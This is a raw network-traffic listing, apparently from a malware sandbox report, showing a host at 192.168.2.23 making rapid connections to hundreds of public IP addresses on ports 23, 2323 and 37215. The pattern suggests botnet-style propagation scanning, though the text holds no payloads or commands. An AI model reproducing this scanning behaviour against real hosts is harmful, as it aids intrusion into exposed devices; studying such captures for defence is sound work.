                                                Feb 12, 2025 16:56:58.745708942 CET5676837215192.168.2.23162.199.37.227
                                                Feb 12, 2025 16:56:58.745718002 CET2354564165.127.40.182192.168.2.23
                                                Feb 12, 2025 16:56:58.745729923 CET232407097.241.255.50192.168.2.23
                                                Feb 12, 2025 16:56:58.745735884 CET4182223192.168.2.23201.49.66.7
                                                Feb 12, 2025 16:56:58.745739937 CET233930642.177.204.67192.168.2.23
                                                Feb 12, 2025 16:56:58.745743990 CET2407023192.168.2.232.40.34.171
                                                Feb 12, 2025 16:56:58.745748997 CET5456423192.168.2.23165.127.40.182
                                                Feb 12, 2025 16:56:58.745749950 CET232324070185.3.28.207192.168.2.23
                                                Feb 12, 2025 16:56:58.745759964 CET232407075.45.244.107192.168.2.23
                                                Feb 12, 2025 16:56:58.745768070 CET2407023192.168.2.2397.241.255.50
                                                Feb 12, 2025 16:56:58.745769978 CET2324070136.13.32.229192.168.2.23
                                                Feb 12, 2025 16:56:58.745780945 CET232407086.103.71.229192.168.2.23
                                                Feb 12, 2025 16:56:58.745780945 CET240702323192.168.2.23185.3.28.207
                                                Feb 12, 2025 16:56:58.745781898 CET3930623192.168.2.2342.177.204.67
                                                Feb 12, 2025 16:56:58.745785952 CET5268637215192.168.2.23157.179.242.22
                                                Feb 12, 2025 16:56:58.745789051 CET2407023192.168.2.2375.45.244.107
                                                Feb 12, 2025 16:56:58.745795012 CET2342058149.220.173.4192.168.2.23
                                                Feb 12, 2025 16:56:58.745798111 CET2407023192.168.2.23136.13.32.229
                                                Feb 12, 2025 16:56:58.745811939 CET3356437215192.168.2.2341.185.106.254
                                                Feb 12, 2025 16:56:58.745815992 CET2324070185.128.129.241192.168.2.23
                                                Feb 12, 2025 16:56:58.745816946 CET2407023192.168.2.2386.103.71.229
                                                Feb 12, 2025 16:56:58.745827913 CET2324070175.28.254.151192.168.2.23
                                                Feb 12, 2025 16:56:58.745830059 CET4205823192.168.2.23149.220.173.4
                                                Feb 12, 2025 16:56:58.745837927 CET2324070145.192.193.63192.168.2.23
                                                Feb 12, 2025 16:56:58.745846987 CET232407042.66.156.63192.168.2.23
                                                Feb 12, 2025 16:56:58.745848894 CET2407023192.168.2.23185.128.129.241
                                                Feb 12, 2025 16:56:58.745858908 CET2324070175.202.41.123192.168.2.23
                                                Feb 12, 2025 16:56:58.745867014 CET2407023192.168.2.23175.28.254.151
                                                Feb 12, 2025 16:56:58.745870113 CET2357416112.100.211.87192.168.2.23
                                                Feb 12, 2025 16:56:58.745874882 CET2407023192.168.2.23145.192.193.63
                                                Feb 12, 2025 16:56:58.745879889 CET2407023192.168.2.2342.66.156.63
                                                Feb 12, 2025 16:56:58.745882034 CET5335837215192.168.2.2341.136.218.101
                                                Feb 12, 2025 16:56:58.745882034 CET232407036.172.78.178192.168.2.23
                                                Feb 12, 2025 16:56:58.745882988 CET2407023192.168.2.23175.202.41.123
                                                Feb 12, 2025 16:56:58.745893955 CET2324070106.39.251.153192.168.2.23
                                                Feb 12, 2025 16:56:58.745903969 CET232334360183.204.106.95192.168.2.23
                                                Feb 12, 2025 16:56:58.745912075 CET5741623192.168.2.23112.100.211.87
                                                Feb 12, 2025 16:56:58.745914936 CET2407023192.168.2.2336.172.78.178
                                                Feb 12, 2025 16:56:58.745915890 CET2354428188.250.172.71192.168.2.23
                                                Feb 12, 2025 16:56:58.745924950 CET4027437215192.168.2.23157.234.192.151
                                                Feb 12, 2025 16:56:58.745927095 CET2407023192.168.2.23106.39.251.153
                                                Feb 12, 2025 16:56:58.745928049 CET235718269.82.173.226192.168.2.23
                                                Feb 12, 2025 16:56:58.745938063 CET23232407083.110.159.223192.168.2.23
                                                Feb 12, 2025 16:56:58.745939016 CET343602323192.168.2.23183.204.106.95
                                                Feb 12, 2025 16:56:58.745945930 CET5442823192.168.2.23188.250.172.71
                                                Feb 12, 2025 16:56:58.745948076 CET2324070102.254.205.220192.168.2.23
                                                Feb 12, 2025 16:56:58.745959044 CET5718223192.168.2.2369.82.173.226
                                                Feb 12, 2025 16:56:58.745959997 CET2324070154.235.100.147192.168.2.23
                                                Feb 12, 2025 16:56:58.745959997 CET6030237215192.168.2.2341.10.8.133
                                                Feb 12, 2025 16:56:58.745970011 CET235161860.83.103.42192.168.2.23
                                                Feb 12, 2025 16:56:58.745975018 CET240702323192.168.2.2383.110.159.223
                                                Feb 12, 2025 16:56:58.745980024 CET2324070113.152.23.39192.168.2.23
                                                Feb 12, 2025 16:56:58.745980024 CET2407023192.168.2.23102.254.205.220
                                                Feb 12, 2025 16:56:58.745987892 CET2407023192.168.2.23154.235.100.147
                                                Feb 12, 2025 16:56:58.745995045 CET5583437215192.168.2.23118.249.101.169
                                                Feb 12, 2025 16:56:58.745995045 CET5161823192.168.2.2360.83.103.42
                                                Feb 12, 2025 16:56:58.746005058 CET5111637215192.168.2.2341.149.251.27
                                                Feb 12, 2025 16:56:58.746009111 CET2355410203.132.56.82192.168.2.23
                                                Feb 12, 2025 16:56:58.746014118 CET2407023192.168.2.23113.152.23.39
                                                Feb 12, 2025 16:56:58.746015072 CET5307437215192.168.2.23197.139.7.61
                                                Feb 12, 2025 16:56:58.746021032 CET2324070202.49.147.227192.168.2.23
                                                Feb 12, 2025 16:56:58.746031046 CET2324070157.42.151.234192.168.2.23
                                                Feb 12, 2025 16:56:58.746032000 CET4841837215192.168.2.23157.51.221.247
                                                Feb 12, 2025 16:56:58.746040106 CET5541023192.168.2.23203.132.56.82
                                                Feb 12, 2025 16:56:58.746048927 CET2407023192.168.2.23202.49.147.227
                                                Feb 12, 2025 16:56:58.746054888 CET5952237215192.168.2.23197.193.183.14
                                                Feb 12, 2025 16:56:58.746056080 CET2407023192.168.2.23157.42.151.234
                                                Feb 12, 2025 16:56:58.746082067 CET3534837215192.168.2.2341.38.53.198
                                                Feb 12, 2025 16:56:58.746098042 CET5879837215192.168.2.23197.79.89.152
                                                Feb 12, 2025 16:56:58.746109009 CET3848037215192.168.2.2341.217.213.110
                                                Feb 12, 2025 16:56:58.746154070 CET235686223.13.124.124192.168.2.23
                                                Feb 12, 2025 16:56:58.746165037 CET232407079.191.235.7192.168.2.23
                                                Feb 12, 2025 16:56:58.746175051 CET2324070166.27.79.57192.168.2.23
                                                Feb 12, 2025 16:56:58.746185064 CET2324070207.127.250.122192.168.2.23
                                                Feb 12, 2025 16:56:58.746190071 CET5686223192.168.2.2323.13.124.124
                                                Feb 12, 2025 16:56:58.746195078 CET232407076.21.113.5192.168.2.23
                                                Feb 12, 2025 16:56:58.746206045 CET232407047.74.208.153192.168.2.23
                                                Feb 12, 2025 16:56:58.746207952 CET2407023192.168.2.2379.191.235.7
                                                Feb 12, 2025 16:56:58.746207952 CET2407023192.168.2.23166.27.79.57
                                                Feb 12, 2025 16:56:58.746207952 CET2407023192.168.2.23207.127.250.122
                                                Feb 12, 2025 16:56:58.746217012 CET233311644.55.32.207192.168.2.23
                                                Feb 12, 2025 16:56:58.746227980 CET233517039.199.182.233192.168.2.23
                                                Feb 12, 2025 16:56:58.746229887 CET2407023192.168.2.2376.21.113.5
                                                Feb 12, 2025 16:56:58.746229887 CET2407023192.168.2.2347.74.208.153
                                                Feb 12, 2025 16:56:58.746237040 CET2351642217.39.19.227192.168.2.23
                                                Feb 12, 2025 16:56:58.746242046 CET3311623192.168.2.2344.55.32.207
                                                Feb 12, 2025 16:56:58.746248007 CET233569689.27.202.147192.168.2.23
                                                Feb 12, 2025 16:56:58.746258974 CET2340882182.158.194.199192.168.2.23
                                                Feb 12, 2025 16:56:58.746268988 CET3517023192.168.2.2339.199.182.233
                                                Feb 12, 2025 16:56:58.746279001 CET2339348122.130.121.252192.168.2.23
                                                Feb 12, 2025 16:56:58.746280909 CET3569623192.168.2.2389.27.202.147
                                                Feb 12, 2025 16:56:58.746280909 CET5164223192.168.2.23217.39.19.227
                                                Feb 12, 2025 16:56:58.746289968 CET235287413.79.235.101192.168.2.23
                                                Feb 12, 2025 16:56:58.746292114 CET4088223192.168.2.23182.158.194.199
                                                Feb 12, 2025 16:56:58.746300936 CET23233690863.219.239.161192.168.2.23
                                                Feb 12, 2025 16:56:58.746309042 CET3934823192.168.2.23122.130.121.252
                                                Feb 12, 2025 16:56:58.746310949 CET234507861.101.193.72192.168.2.23
                                                Feb 12, 2025 16:56:58.746323109 CET2354978203.99.76.96192.168.2.23
                                                Feb 12, 2025 16:56:58.746331930 CET234940681.152.188.185192.168.2.23
                                                Feb 12, 2025 16:56:58.746334076 CET5287423192.168.2.2313.79.235.101
                                                Feb 12, 2025 16:56:58.746335983 CET369082323192.168.2.2363.219.239.161
                                                Feb 12, 2025 16:56:58.746344090 CET2340412122.81.238.41192.168.2.23
                                                Feb 12, 2025 16:56:58.746346951 CET4507823192.168.2.2361.101.193.72
                                                Feb 12, 2025 16:56:58.746355057 CET2350192163.9.31.33192.168.2.23
                                                Feb 12, 2025 16:56:58.746365070 CET2352514112.143.124.103192.168.2.23
                                                Feb 12, 2025 16:56:58.746367931 CET5497823192.168.2.23203.99.76.96
                                                Feb 12, 2025 16:56:58.746371984 CET4940623192.168.2.2381.152.188.185
                                                Feb 12, 2025 16:56:58.746376038 CET4041223192.168.2.23122.81.238.41
                                                Feb 12, 2025 16:56:58.746392012 CET5019223192.168.2.23163.9.31.33
                                                Feb 12, 2025 16:56:58.746392012 CET5251423192.168.2.23112.143.124.103
                                                Feb 12, 2025 16:56:58.746570110 CET232357640115.224.16.130192.168.2.23
                                                Feb 12, 2025 16:56:58.746579885 CET234423296.249.194.161192.168.2.23
                                                Feb 12, 2025 16:56:58.746589899 CET2335312100.51.118.112192.168.2.23
                                                Feb 12, 2025 16:56:58.746601105 CET235968262.221.195.170192.168.2.23
                                                Feb 12, 2025 16:56:58.746609926 CET2354860130.227.26.12192.168.2.23
                                                Feb 12, 2025 16:56:58.746611118 CET576402323192.168.2.23115.224.16.130
                                                Feb 12, 2025 16:56:58.746620893 CET2348032154.187.153.46192.168.2.23
                                                Feb 12, 2025 16:56:58.746624947 CET4423223192.168.2.2396.249.194.161
                                                Feb 12, 2025 16:56:58.746624947 CET3531223192.168.2.23100.51.118.112
                                                Feb 12, 2025 16:56:58.746625900 CET234094875.212.176.121192.168.2.23
                                                Feb 12, 2025 16:56:58.746634007 CET5968223192.168.2.2362.221.195.170
                                                Feb 12, 2025 16:56:58.746638060 CET234995270.144.123.171192.168.2.23
                                                Feb 12, 2025 16:56:58.746646881 CET2343728174.151.102.200192.168.2.23
                                                Feb 12, 2025 16:56:58.746656895 CET2343192148.118.231.188192.168.2.23
                                                Feb 12, 2025 16:56:58.746659994 CET5486023192.168.2.23130.227.26.12
                                                Feb 12, 2025 16:56:58.746659994 CET4094823192.168.2.2375.212.176.121
                                                Feb 12, 2025 16:56:58.746666908 CET232337714221.69.127.6192.168.2.23
                                                Feb 12, 2025 16:56:58.746668100 CET4803223192.168.2.23154.187.153.46
                                                Feb 12, 2025 16:56:58.746668100 CET4995223192.168.2.2370.144.123.171
                                                Feb 12, 2025 16:56:58.746680021 CET4372823192.168.2.23174.151.102.200
                                                Feb 12, 2025 16:56:58.746682882 CET4319223192.168.2.23148.118.231.188
                                                Feb 12, 2025 16:56:58.746687889 CET235289258.117.152.149192.168.2.23
                                                Feb 12, 2025 16:56:58.746695995 CET377142323192.168.2.23221.69.127.6
                                                Feb 12, 2025 16:56:58.746699095 CET2339514116.157.43.96192.168.2.23
                                                Feb 12, 2025 16:56:58.746707916 CET2351956188.120.176.37192.168.2.23
                                                Feb 12, 2025 16:56:58.746718884 CET235128663.138.15.160192.168.2.23
                                                Feb 12, 2025 16:56:58.746727943 CET3951423192.168.2.23116.157.43.96
                                                Feb 12, 2025 16:56:58.746728897 CET5289223192.168.2.2358.117.152.149
                                                Feb 12, 2025 16:56:58.746730089 CET235584876.192.122.252192.168.2.23
                                                Feb 12, 2025 16:56:58.746740103 CET2335786159.244.221.197192.168.2.23
                                                Feb 12, 2025 16:56:58.746747971 CET5195623192.168.2.23188.120.176.37
                                                Feb 12, 2025 16:56:58.746751070 CET2341436109.55.228.43192.168.2.23
                                                Feb 12, 2025 16:56:58.746752024 CET5128623192.168.2.2363.138.15.160
                                                Feb 12, 2025 16:56:58.746761084 CET234042458.203.234.227192.168.2.23
                                                Feb 12, 2025 16:56:58.746766090 CET5584823192.168.2.2376.192.122.252
                                                Feb 12, 2025 16:56:58.746773005 CET233843887.187.1.120192.168.2.23
                                                Feb 12, 2025 16:56:58.746773958 CET3578623192.168.2.23159.244.221.197
                                                Feb 12, 2025 16:56:58.746779919 CET4143623192.168.2.23109.55.228.43
                                                Feb 12, 2025 16:56:58.746782064 CET232352634121.112.70.139192.168.2.23
                                                Feb 12, 2025 16:56:58.746792078 CET4042423192.168.2.2358.203.234.227
                                                Feb 12, 2025 16:56:58.746793032 CET2343718167.50.74.92192.168.2.23
                                                Feb 12, 2025 16:56:58.746800900 CET3843823192.168.2.2387.187.1.120
                                                Feb 12, 2025 16:56:58.746814966 CET526342323192.168.2.23121.112.70.139
                                                Feb 12, 2025 16:56:58.746825933 CET4371823192.168.2.23167.50.74.92
                                                Feb 12, 2025 16:56:58.747009993 CET234836637.122.117.136192.168.2.23
                                                Feb 12, 2025 16:56:58.747025967 CET2360726221.208.230.171192.168.2.23
                                                Feb 12, 2025 16:56:58.747036934 CET2347146169.183.77.108192.168.2.23
                                                Feb 12, 2025 16:56:58.747049093 CET234557443.226.81.179192.168.2.23
                                                Feb 12, 2025 16:56:58.747054100 CET236065491.123.233.38192.168.2.23
                                                Feb 12, 2025 16:56:58.747057915 CET2346388199.93.115.220192.168.2.23
                                                Feb 12, 2025 16:56:58.747065067 CET4836623192.168.2.2337.122.117.136
                                                Feb 12, 2025 16:56:58.747072935 CET6072623192.168.2.23221.208.230.171
                                                Feb 12, 2025 16:56:58.747077942 CET6065423192.168.2.2391.123.233.38
                                                Feb 12, 2025 16:56:58.747081041 CET4714623192.168.2.23169.183.77.108
                                                Feb 12, 2025 16:56:58.747081041 CET4557423192.168.2.2343.226.81.179
                                                Feb 12, 2025 16:56:58.747095108 CET4638823192.168.2.23199.93.115.220
                                                Feb 12, 2025 16:56:58.747143030 CET235817858.197.183.54192.168.2.23
                                                Feb 12, 2025 16:56:58.747153044 CET2353124163.214.146.191192.168.2.23
                                                Feb 12, 2025 16:56:58.747157097 CET2352492173.107.155.243192.168.2.23
                                                Feb 12, 2025 16:56:58.747162104 CET2357164133.123.240.113192.168.2.23
                                                Feb 12, 2025 16:56:58.747165918 CET232336456165.176.179.13192.168.2.23
                                                Feb 12, 2025 16:56:58.747169971 CET234120263.244.169.135192.168.2.23
                                                Feb 12, 2025 16:56:58.747174025 CET235474286.215.187.181192.168.2.23
                                                Feb 12, 2025 16:56:58.747178078 CET234446682.60.190.122192.168.2.23
                                                Feb 12, 2025 16:56:58.747181892 CET2336040121.193.3.235192.168.2.23
                                                Feb 12, 2025 16:56:58.747194052 CET2343024203.239.119.167192.168.2.23
                                                Feb 12, 2025 16:56:58.747204065 CET234499078.240.222.208192.168.2.23
                                                Feb 12, 2025 16:56:58.747205019 CET5817823192.168.2.2358.197.183.54
                                                Feb 12, 2025 16:56:58.747209072 CET5312423192.168.2.23163.214.146.191
                                                Feb 12, 2025 16:56:58.747209072 CET5716423192.168.2.23133.123.240.113
                                                Feb 12, 2025 16:56:58.747211933 CET5249223192.168.2.23173.107.155.243
                                                Feb 12, 2025 16:56:58.747212887 CET4120223192.168.2.2363.244.169.135
                                                Feb 12, 2025 16:56:58.747215986 CET234073442.204.38.170192.168.2.23
                                                Feb 12, 2025 16:56:58.747220993 CET364562323192.168.2.23165.176.179.13
                                                Feb 12, 2025 16:56:58.747221947 CET5474223192.168.2.2386.215.187.181
                                                Feb 12, 2025 16:56:58.747225046 CET3604023192.168.2.23121.193.3.235
                                                Feb 12, 2025 16:56:58.747225046 CET234118290.222.22.23192.168.2.23
                                                Feb 12, 2025 16:56:58.747229099 CET4302423192.168.2.23203.239.119.167
                                                Feb 12, 2025 16:56:58.747231007 CET233919854.136.225.228192.168.2.23
                                                Feb 12, 2025 16:56:58.747234106 CET4446623192.168.2.2382.60.190.122
                                                Feb 12, 2025 16:56:58.747234106 CET4499023192.168.2.2378.240.222.208
                                                Feb 12, 2025 16:56:58.747241020 CET2350640124.130.207.143192.168.2.23
                                                Feb 12, 2025 16:56:58.747250080 CET233427281.188.12.158192.168.2.23
                                                Feb 12, 2025 16:56:58.747261047 CET4073423192.168.2.2342.204.38.170
                                                Feb 12, 2025 16:56:58.747262001 CET4118223192.168.2.2390.222.22.23
                                                Feb 12, 2025 16:56:58.747267008 CET3919823192.168.2.2354.136.225.228
                                                Feb 12, 2025 16:56:58.747277975 CET5064023192.168.2.23124.130.207.143
                                                Feb 12, 2025 16:56:58.747279882 CET3427223192.168.2.2381.188.12.158
                                                Feb 12, 2025 16:56:58.747545004 CET235787473.3.193.72192.168.2.23
                                                Feb 12, 2025 16:56:58.747555971 CET232358806189.90.156.123192.168.2.23
                                                Feb 12, 2025 16:56:58.747565031 CET234882236.172.109.15192.168.2.23
                                                Feb 12, 2025 16:56:58.747571945 CET2344606170.250.99.38192.168.2.23
                                                Feb 12, 2025 16:56:58.747581005 CET2344268107.153.200.121192.168.2.23
                                                Feb 12, 2025 16:56:58.747597933 CET5787423192.168.2.2373.3.193.72
                                                Feb 12, 2025 16:56:58.747606039 CET4882223192.168.2.2336.172.109.15
                                                Feb 12, 2025 16:56:58.747606993 CET588062323192.168.2.23189.90.156.123
                                                Feb 12, 2025 16:56:58.747612953 CET236065837.223.124.90192.168.2.23
                                                Feb 12, 2025 16:56:58.747617006 CET4460623192.168.2.23170.250.99.38
                                                Feb 12, 2025 16:56:58.747622967 CET2351102109.120.100.27192.168.2.23
                                                Feb 12, 2025 16:56:58.747634888 CET23234919437.140.240.139192.168.2.23
                                                Feb 12, 2025 16:56:58.747641087 CET4426823192.168.2.23107.153.200.121
                                                Feb 12, 2025 16:56:58.747644901 CET233428841.156.120.254192.168.2.23
                                                Feb 12, 2025 16:56:58.747653961 CET6065823192.168.2.2337.223.124.90
                                                Feb 12, 2025 16:56:58.747658014 CET2360196217.139.236.244192.168.2.23
                                                Feb 12, 2025 16:56:58.747663021 CET5110223192.168.2.23109.120.100.27
                                                Feb 12, 2025 16:56:58.747665882 CET491942323192.168.2.2337.140.240.139
                                                Feb 12, 2025 16:56:58.747668982 CET2350868170.253.63.211192.168.2.23
                                                Feb 12, 2025 16:56:58.747678041 CET233967690.42.195.7192.168.2.23
                                                Feb 12, 2025 16:56:58.747678041 CET3428823192.168.2.2341.156.120.254
                                                Feb 12, 2025 16:56:58.747689009 CET235115872.108.91.81192.168.2.23
                                                Feb 12, 2025 16:56:58.747694969 CET6019623192.168.2.23217.139.236.244
                                                Feb 12, 2025 16:56:58.747699022 CET2334386148.177.23.162192.168.2.23
                                                Feb 12, 2025 16:56:58.747708082 CET5086823192.168.2.23170.253.63.211
                                                Feb 12, 2025 16:56:58.747708082 CET3967623192.168.2.2390.42.195.7
                                                Feb 12, 2025 16:56:58.747720003 CET5115823192.168.2.2372.108.91.81
                                                Feb 12, 2025 16:56:58.747720957 CET2360364106.85.17.38192.168.2.23
                                                Feb 12, 2025 16:56:58.747730970 CET2356378169.120.226.29192.168.2.23
                                                Feb 12, 2025 16:56:58.747740030 CET233939637.212.49.194192.168.2.23
                                                Feb 12, 2025 16:56:58.747745991 CET3438623192.168.2.23148.177.23.162
                                                Feb 12, 2025 16:56:58.747749090 CET6036423192.168.2.23106.85.17.38
                                                Feb 12, 2025 16:56:58.747750998 CET2357728152.11.133.167192.168.2.23
                                                Feb 12, 2025 16:56:58.747761965 CET235539062.0.130.87192.168.2.23
                                                Feb 12, 2025 16:56:58.747771978 CET233628684.37.173.167192.168.2.23
                                                Feb 12, 2025 16:56:58.747771978 CET5637823192.168.2.23169.120.226.29
                                                Feb 12, 2025 16:56:58.747775078 CET3939623192.168.2.2337.212.49.194
                                                Feb 12, 2025 16:56:58.747781992 CET2346348154.47.101.248192.168.2.23
                                                Feb 12, 2025 16:56:58.747783899 CET5772823192.168.2.23152.11.133.167
                                                Feb 12, 2025 16:56:58.747797966 CET5539023192.168.2.2362.0.130.87
                                                Feb 12, 2025 16:56:58.747801065 CET2357544115.126.124.110192.168.2.23
                                                Feb 12, 2025 16:56:58.747806072 CET3628623192.168.2.2384.37.173.167
                                                Feb 12, 2025 16:56:58.747806072 CET4634823192.168.2.23154.47.101.248
                                                Feb 12, 2025 16:56:58.747829914 CET2354402101.247.0.41192.168.2.23
                                                Feb 12, 2025 16:56:58.747834921 CET5754423192.168.2.23115.126.124.110
                                                Feb 12, 2025 16:56:58.747840881 CET234966832.13.149.146192.168.2.23
                                                Feb 12, 2025 16:56:58.747850895 CET232360158113.104.31.190192.168.2.23
                                                Feb 12, 2025 16:56:58.747860909 CET2357252164.83.36.18192.168.2.23
                                                Feb 12, 2025 16:56:58.747859955 CET5440223192.168.2.23101.247.0.41
                                                Feb 12, 2025 16:56:58.747868061 CET4966823192.168.2.2332.13.149.146
                                                Feb 12, 2025 16:56:58.747881889 CET235238669.35.70.13192.168.2.23
                                                Feb 12, 2025 16:56:58.747883081 CET601582323192.168.2.23113.104.31.190
                                                Feb 12, 2025 16:56:58.747894049 CET235990658.56.45.236192.168.2.23
                                                Feb 12, 2025 16:56:58.747894049 CET5725223192.168.2.23164.83.36.18
                                                Feb 12, 2025 16:56:58.747904062 CET232352390175.69.177.136192.168.2.23
                                                Feb 12, 2025 16:56:58.747914076 CET2333716220.254.57.129192.168.2.23
                                                Feb 12, 2025 16:56:58.747920036 CET5238623192.168.2.2369.35.70.13
                                                Feb 12, 2025 16:56:58.747925043 CET2346542121.114.84.210192.168.2.23
                                                Feb 12, 2025 16:56:58.747929096 CET523902323192.168.2.23175.69.177.136
                                                Feb 12, 2025 16:56:58.747931957 CET5990623192.168.2.2358.56.45.236
                                                Feb 12, 2025 16:56:58.747936010 CET2346594187.115.221.84192.168.2.23
                                                Feb 12, 2025 16:56:58.747944117 CET3371623192.168.2.23220.254.57.129
                                                Feb 12, 2025 16:56:58.747946978 CET2345712126.185.106.238192.168.2.23
                                                Feb 12, 2025 16:56:58.747953892 CET4654223192.168.2.23121.114.84.210
                                                Feb 12, 2025 16:56:58.747957945 CET23585568.254.10.88192.168.2.23
                                                Feb 12, 2025 16:56:58.747965097 CET4659423192.168.2.23187.115.221.84
                                                Feb 12, 2025 16:56:58.747968912 CET2342286174.230.188.24192.168.2.23
                                                Feb 12, 2025 16:56:58.747981071 CET2354608152.41.63.174192.168.2.23
                                                Feb 12, 2025 16:56:58.747991085 CET23233656485.36.163.7192.168.2.23
                                                Feb 12, 2025 16:56:58.747992039 CET4571223192.168.2.23126.185.106.238
                                                Feb 12, 2025 16:56:58.747992039 CET5855623192.168.2.238.254.10.88
                                                Feb 12, 2025 16:56:58.748001099 CET4228623192.168.2.23174.230.188.24
                                                Feb 12, 2025 16:56:58.748004913 CET235584479.36.196.133192.168.2.23
                                                Feb 12, 2025 16:56:58.748008966 CET5460823192.168.2.23152.41.63.174
                                                Feb 12, 2025 16:56:58.748017073 CET2337840142.42.55.107192.168.2.23
                                                Feb 12, 2025 16:56:58.748024940 CET365642323192.168.2.2385.36.163.7
                                                Feb 12, 2025 16:56:58.748028040 CET2354460183.166.178.162192.168.2.23
                                                Feb 12, 2025 16:56:58.748038054 CET5584423192.168.2.2379.36.196.133
                                                Feb 12, 2025 16:56:58.748039007 CET2359008195.181.138.60192.168.2.23
                                                Feb 12, 2025 16:56:58.748049021 CET2355878110.94.222.182192.168.2.23
                                                Feb 12, 2025 16:56:58.748054028 CET3784023192.168.2.23142.42.55.107
                                                Feb 12, 2025 16:56:58.748059034 CET233482468.102.82.48192.168.2.23
                                                Feb 12, 2025 16:56:58.748064041 CET5446023192.168.2.23183.166.178.162
                                                Feb 12, 2025 16:56:58.748066902 CET5900823192.168.2.23195.181.138.60
                                                Feb 12, 2025 16:56:58.748070002 CET2358620177.203.138.237192.168.2.23
                                                Feb 12, 2025 16:56:58.748074055 CET5587823192.168.2.23110.94.222.182
                                                Feb 12, 2025 16:56:58.748094082 CET3482423192.168.2.2368.102.82.48
                                                Feb 12, 2025 16:56:58.748107910 CET5862023192.168.2.23177.203.138.237
                                                Feb 12, 2025 16:56:58.748450041 CET235331285.154.19.154192.168.2.23
                                                Feb 12, 2025 16:56:58.748461008 CET234733838.169.210.230192.168.2.23
                                                Feb 12, 2025 16:56:58.748470068 CET2349972175.156.58.80192.168.2.23
                                                Feb 12, 2025 16:56:58.748480082 CET2355818102.215.117.227192.168.2.23
                                                Feb 12, 2025 16:56:58.748483896 CET234625671.121.236.245192.168.2.23
                                                Feb 12, 2025 16:56:58.748495102 CET235849827.21.181.204192.168.2.23
                                                Feb 12, 2025 16:56:58.748506069 CET234554296.74.230.249192.168.2.23
                                                Feb 12, 2025 16:56:58.748514891 CET5331223192.168.2.2385.154.19.154
                                                Feb 12, 2025 16:56:58.748516083 CET4733823192.168.2.2338.169.210.230
                                                Feb 12, 2025 16:56:58.748517990 CET232344242104.195.16.58192.168.2.23
                                                Feb 12, 2025 16:56:58.748518944 CET5581823192.168.2.23102.215.117.227
                                                Feb 12, 2025 16:56:58.748518944 CET4997223192.168.2.23175.156.58.80
                                                Feb 12, 2025 16:56:58.748529911 CET233803496.72.63.81192.168.2.23
                                                Feb 12, 2025 16:56:58.748529911 CET4625623192.168.2.2371.121.236.245
                                                Feb 12, 2025 16:56:58.748538971 CET4554223192.168.2.2396.74.230.249
                                                Feb 12, 2025 16:56:58.748542070 CET233497245.1.4.155192.168.2.23
                                                Feb 12, 2025 16:56:58.748542070 CET5849823192.168.2.2327.21.181.204
                                                Feb 12, 2025 16:56:58.748553038 CET2343968111.76.152.40192.168.2.23
                                                Feb 12, 2025 16:56:58.748553991 CET442422323192.168.2.23104.195.16.58
                                                Feb 12, 2025 16:56:58.748564005 CET2345588143.22.19.183192.168.2.23
                                                Feb 12, 2025 16:56:58.748568058 CET3803423192.168.2.2396.72.63.81
                                                Feb 12, 2025 16:56:58.748583078 CET3497223192.168.2.2345.1.4.155
                                                Feb 12, 2025 16:56:58.748586893 CET4396823192.168.2.23111.76.152.40
                                                Feb 12, 2025 16:56:58.748598099 CET4558823192.168.2.23143.22.19.183
                                                Feb 12, 2025 16:56:58.752026081 CET3721524582222.152.153.198192.168.2.23
                                                Feb 12, 2025 16:56:58.752037048 CET372152458294.252.250.153192.168.2.23
                                                Feb 12, 2025 16:56:58.752046108 CET372152458280.120.167.73192.168.2.23
                                                Feb 12, 2025 16:56:58.752051115 CET372152458241.234.212.55192.168.2.23
                                                Feb 12, 2025 16:56:58.752060890 CET3721524582202.58.238.201192.168.2.23
                                                Feb 12, 2025 16:56:58.752070904 CET3721524582175.78.206.202192.168.2.23
                                                Feb 12, 2025 16:56:58.752082109 CET372152458241.28.165.54192.168.2.23
                                                Feb 12, 2025 16:56:58.752090931 CET3721524582197.11.67.129192.168.2.23
                                                Feb 12, 2025 16:56:58.752091885 CET2458237215192.168.2.23222.152.153.198
                                                Feb 12, 2025 16:56:58.752100945 CET372152458219.78.162.5192.168.2.23
                                                Feb 12, 2025 16:56:58.752104998 CET2458237215192.168.2.2394.252.250.153
                                                Feb 12, 2025 16:56:58.752104998 CET2458237215192.168.2.2380.120.167.73
                                                Feb 12, 2025 16:56:58.752111912 CET3721524582197.198.227.69192.168.2.23
                                                Feb 12, 2025 16:56:58.752115011 CET2458237215192.168.2.2341.28.165.54
                                                Feb 12, 2025 16:56:58.752120018 CET2458237215192.168.2.2341.234.212.55
                                                Feb 12, 2025 16:56:58.752120018 CET2458237215192.168.2.23202.58.238.201
                                                Feb 12, 2025 16:56:58.752125025 CET3721524582197.244.239.131192.168.2.23
                                                Feb 12, 2025 16:56:58.752125978 CET2458237215192.168.2.23197.11.67.129
                                                Feb 12, 2025 16:56:58.752134085 CET2458237215192.168.2.23175.78.206.202
                                                Feb 12, 2025 16:56:58.752135992 CET2458237215192.168.2.2319.78.162.5
                                                Feb 12, 2025 16:56:58.752136946 CET3721524582197.36.230.88192.168.2.23
                                                Feb 12, 2025 16:56:58.752157927 CET2458237215192.168.2.23197.198.227.69
                                                Feb 12, 2025 16:56:58.752161026 CET2458237215192.168.2.23197.244.239.131
                                                Feb 12, 2025 16:56:58.752181053 CET2458237215192.168.2.23197.36.230.88
                                                Feb 12, 2025 16:56:58.752806902 CET3721524582197.118.5.108192.168.2.23
                                                Feb 12, 2025 16:56:58.752818108 CET3721524582157.143.12.42192.168.2.23
                                                Feb 12, 2025 16:56:58.752825975 CET372152458241.135.123.15192.168.2.23
                                                Feb 12, 2025 16:56:58.752836943 CET37215245828.81.85.227192.168.2.23
                                                Feb 12, 2025 16:56:58.752846003 CET3721524582157.6.128.12192.168.2.23
                                                Feb 12, 2025 16:56:58.752856016 CET3721524582157.201.253.144192.168.2.23
                                                Feb 12, 2025 16:56:58.752866030 CET372152458241.105.184.97192.168.2.23
                                                Feb 12, 2025 16:56:58.752865076 CET2458237215192.168.2.23197.118.5.108
                                                Feb 12, 2025 16:56:58.752871037 CET2458237215192.168.2.2341.135.123.15
                                                Feb 12, 2025 16:56:58.752871037 CET2458237215192.168.2.23157.6.128.12
                                                Feb 12, 2025 16:56:58.752876043 CET3721524582193.111.52.71192.168.2.23
                                                Feb 12, 2025 16:56:58.752880096 CET2458237215192.168.2.238.81.85.227
                                                Feb 12, 2025 16:56:58.752885103 CET2458237215192.168.2.23157.143.12.42
                                                Feb 12, 2025 16:56:58.752885103 CET2458237215192.168.2.23157.201.253.144
                                                Feb 12, 2025 16:56:58.752887011 CET3721524582157.37.22.210192.168.2.23
